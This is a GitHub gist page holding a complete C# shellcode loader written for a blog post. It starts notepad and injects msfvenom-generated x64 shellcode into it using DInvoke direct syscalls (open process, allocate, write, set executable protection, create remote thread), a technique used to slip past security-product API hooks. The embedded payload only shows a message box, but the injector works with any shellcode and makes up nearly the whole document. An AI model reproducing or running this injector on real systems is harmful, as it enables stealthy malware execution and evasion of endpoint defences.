Skip to content

Instantly share code, notes, and snippets.

@ChoiSG
Created May 7, 2021 18:37
Show Gist options
  • Save ChoiSG/d61fc7e3fc761499928791714ffbd3e3 to your computer and use it in GitHub Desktop.
Save ChoiSG/d61fc7e3fc761499928791714ffbd3e3 to your computer and use it in GitHub Desktop.
dinvoke with syscall - created for blog post
using System;
using DInvoke;
using System.Diagnostics;
using System.Runtime.InteropServices;
using DynamicInvoke = DInvoke.DynamicInvoke;
using Data = DInvoke.Data;
namespace dinvokeSyscall
{
class Program
{
static void Main(string[] args)
{
// msfvenom MesssageBox - msfvenom -c messageBox -a x64 --platform windows -p windows/x64/messagebox TEXT="Malicious Program incoming" -f csharp
byte[] buf = new byte[305] {
0xfc,0x48,0x81,0xe4,0xf0,0xff,0xff,0xff,0xe8,0xd0,0x00,0x00,0x00,0x41,0x51,
0x41,0x50,0x52,0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x3e,0x48,
0x8b,0x52,0x18,0x3e,0x48,0x8b,0x52,0x20,0x3e,0x48,0x8b,0x72,0x50,0x3e,0x48,
0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,
0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x3e,
0x48,0x8b,0x52,0x20,0x3e,0x8b,0x42,0x3c,0x48,0x01,0xd0,0x3e,0x8b,0x80,0x88,
0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x6f,0x48,0x01,0xd0,0x50,0x3e,0x8b,0x48,
0x18,0x3e,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x5c,0x48,0xff,0xc9,0x3e,
0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,
0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x3e,0x4c,0x03,0x4c,0x24,
0x08,0x45,0x39,0xd1,0x75,0xd6,0x58,0x3e,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
0x66,0x3e,0x41,0x8b,0x0c,0x48,0x3e,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x3e,
0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,
0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,
0x59,0x5a,0x3e,0x48,0x8b,0x12,0xe9,0x49,0xff,0xff,0xff,0x5d,0x49,0xc7,0xc1,
0x00,0x00,0x00,0x00,0x3e,0x48,0x8d,0x95,0xfe,0x00,0x00,0x00,0x3e,0x4c,0x8d,
0x85,0x19,0x01,0x00,0x00,0x48,0x31,0xc9,0x41,0xba,0x45,0x83,0x56,0x07,0xff,
0xd5,0x48,0x31,0xc9,0x41,0xba,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x4d,0x61,0x6c,
0x69,0x63,0x69,0x6f,0x75,0x73,0x20,0x50,0x72,0x6f,0x67,0x72,0x61,0x6d,0x20,
0x69,0x6e,0x63,0x6f,0x6d,0x69,0x6e,0x67,0x00,0x4d,0x65,0x73,0x73,0x61,0x67,
0x65,0x42,0x6f,0x78,0x00 };
byte[] sc = buf;
var process = Process.Start("C:\\Windows\\System32\\notepad.exe");
var pid = (uint)process.Id;
Console.WriteLine("[+] Notepad pid: " + pid);
IntPtr stub = DynamicInvoke.Generic.GetSyscallStub("NtOpenProcess");
DELEGATES.NtOpenProcess NtOpenProcessSyscall = (DELEGATES.NtOpenProcess)Marshal.GetDelegateForFunctionPointer(stub, typeof(DELEGATES.NtOpenProcess));
IntPtr procHandle = IntPtr.Zero;
Data.Native.OBJECT_ATTRIBUTES oa = new Data.Native.OBJECT_ATTRIBUTES();
Data.Native.CLIENT_ID ci = new Data.Native.CLIENT_ID();
ci.UniqueProcess = (IntPtr)pid;
NtOpenProcessSyscall(ref procHandle, Data.Win32.Kernel32.ProcessAccessFlags.PROCESS_ALL_ACCESS, ref oa, ref ci);
stub = DynamicInvoke.Generic.GetSyscallStub("NtAllocateVirtualMemory");
IntPtr baseAddress = IntPtr.Zero;
UInt32 regionSize = (UInt32)sc.Length;
DELEGATES.NtAllocateVirtualMemory NtAllocateVirtualMemorySyscall= (DELEGATES.NtAllocateVirtualMemory)Marshal.GetDelegateForFunctionPointer(stub, typeof(DELEGATES.NtAllocateVirtualMemory));
NtAllocateVirtualMemorySyscall(procHandle, ref baseAddress, (UInt32)0, ref regionSize, (UInt32)0x00001000 | (UInt32)0x00002000, (UInt32)0x04);
Console.WriteLine("[+] Allocated memory addr: 0x" + baseAddress.ToInt64().ToString("x2"));
stub = DynamicInvoke.Generic.GetSyscallStub("NtWriteVirtualMemory");
UInt32 bufferLength = (UInt32)sc.Length;
DELEGATES.NtWriteVirtualMemory NtWriteVirtualMemorySyscall = (DELEGATES.NtWriteVirtualMemory)Marshal.GetDelegateForFunctionPointer(stub, typeof(DELEGATES.NtWriteVirtualMemory));
NtWriteVirtualMemorySyscall(procHandle, baseAddress, Marshal.UnsafeAddrOfPinnedArrayElement(sc, 0), bufferLength, ref bufferLength);
stub = DynamicInvoke.Generic.GetSyscallStub("NtProtectVirtualMemory");
UInt32 oldProtect = (UInt32)0;
IntPtr regionSizePtr = (IntPtr)sc.Length;
DELEGATES.NtProtectVirtualMemory NtProtectVirtualMemorySyscall = (DELEGATES.NtProtectVirtualMemory)Marshal.GetDelegateForFunctionPointer(stub, typeof(DELEGATES.NtProtectVirtualMemory));
NtProtectVirtualMemorySyscall(procHandle, ref baseAddress, ref regionSizePtr, (UInt32)0x20, ref oldProtect);
stub = DynamicInvoke.Generic.GetSyscallStub("NtCreateThreadEx");
DELEGATES.NtCreateThreadEx NtCreateThreadExSyscall = (DELEGATES.NtCreateThreadEx)Marshal.GetDelegateForFunctionPointer(stub, typeof(DELEGATES.NtCreateThreadEx));
NtCreateThreadExSyscall(out IntPtr threadHeandle, Data.Win32.WinNT.ACCESS_MASK.MAXIMUM_ALLOWED, IntPtr.Zero, procHandle, baseAddress, IntPtr.Zero, false, 0, 0, 0, IntPtr.Zero);
Console.WriteLine("[+] Starting Remote Thread");
}
}
public class DELEGATES
{
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
public delegate Data.Native.NTSTATUS NtOpenProcess(ref IntPtr ProcessHandle, Data.Win32.Kernel32.ProcessAccessFlags AccessMask, ref Data.Native.OBJECT_ATTRIBUTES ObjectAttributes, ref Data.Native.CLIENT_ID ClientId);
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
public delegate Data.Native.NTSTATUS NtAllocateVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, UInt32 ZeroBits, ref UInt32 RegionSize, UInt32 AllocationType, UInt32 Protect);
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
public delegate UInt32 NtProtectVirtualMemory(IntPtr ProcessHandle, ref IntPtr BaseAddress, ref IntPtr RegionSize, UInt32 NewProtect, ref UInt32 OldProtect);
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
public delegate UInt32 NtWriteVirtualMemory(IntPtr ProcessHandle, IntPtr BaseAddress, IntPtr Buffer, UInt32 BufferLength, ref UInt32 BytesWritten);
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
public delegate Data.Native.NTSTATUS NtCreateThreadEx(out IntPtr threadHandle, Data.Win32.WinNT.ACCESS_MASK desiredAccess, IntPtr objectAttributes, IntPtr processHandle, IntPtr startAddress, IntPtr parameter, bool createSuspended, int stackZeroBits, int sizeOfStack, int maximumStackSize, IntPtr attributeList);
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment